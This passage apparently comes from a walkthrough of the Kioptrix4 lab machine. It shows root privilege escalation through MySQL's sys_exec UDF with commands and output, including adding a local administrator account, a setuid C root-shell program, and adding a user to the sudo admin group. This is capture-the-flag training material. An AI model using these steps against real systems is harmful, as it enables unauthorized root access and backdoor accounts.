CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>which creates a local administrator.</p><p>On this Linux target the same idea applies. First locate <code>lib_mysqludf_sys.so</code>; it is already installed in <code>/usr/lib</code>, a directory the dynamic linker searches, so this MySQL 5.0 server can load it without any <code>plugin_dir</code> restriction:</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><p>Then, in MySQL, create the <code>sys_exec</code> function (it is already defined on this box) and run a command through it. The connection drops on the first call, but the command still runs, as the file it leaves in <code>/tmp</code> shows:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.00 sec)
 
mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p>The output of the command run through <code>sys_exec()</code> was written to <code>/tmp/out</code>, and it shows the function runs as <code>root</code>: mysqld itself runs as root on this box.</p><p>One way to use that is a small C program which a <code>sys_exec()</code> call can then make setuid root:</p><pre class="md-fences mock-cm md-end-block" lang="">#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Spawns a root shell once the binary is owned by root and setuid
 * (chown root:root and chmod 4755, done through sys_exec()). */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
</pre><p>Compile it locally, upload it to the target and make it setuid root from MySQL, for example <code>sys_exec('chown root:root /tmp/rootsh; chmod 4755 /tmp/rootsh')</code> if it was uploaded as <code>/tmp/rootsh</code>.</p><p>Here <code>wget</code> from the target timed out, probably because a firewall blocks the outbound connection, so instead use <code>sys_exec()</code> to add <code>john</code> to the <code>admin</code> group directly. The first attempt below omits the user name and fails; the second works:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.07 sec)
 
</pre><p><code>SELECT sys_exec('usermod -a -G admin john');</code> adds <code>john</code> to the <code>admin</code> group, which on Ubuntu 8.04 is granted <code>%admin ALL=(ALL) ALL</code> in <code>/etc/sudoers</code>. <code>sudo</code> then accepts john's own password:</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>That gives us <code>root</code>.</p></div>
</body>
</html>